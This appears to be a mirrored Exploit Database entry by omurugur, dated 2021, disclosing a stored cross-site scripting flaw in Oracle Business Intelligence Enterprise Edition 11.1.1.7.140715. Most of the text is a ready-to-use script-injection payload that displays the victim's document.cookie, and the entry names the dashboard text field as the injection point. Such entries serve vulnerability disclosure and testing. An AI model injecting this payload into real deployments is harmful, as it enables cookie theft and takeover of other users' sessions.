Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 – Stored XSS

• Exploit Database
• 16 阅读

• 作者： omurugur
  日期： 2021-01-20
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49444/

• # Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
  # Exploit Author: omurugur
  # Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
  # Version: 11.1.1.7.140715
  # Author Web: https://www.justsecnow.com
  # Author Social: @omurugurrr
  
  StoredXSS:
  
  “;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}
  
  Vulnerable area = Dashboard - Add New Text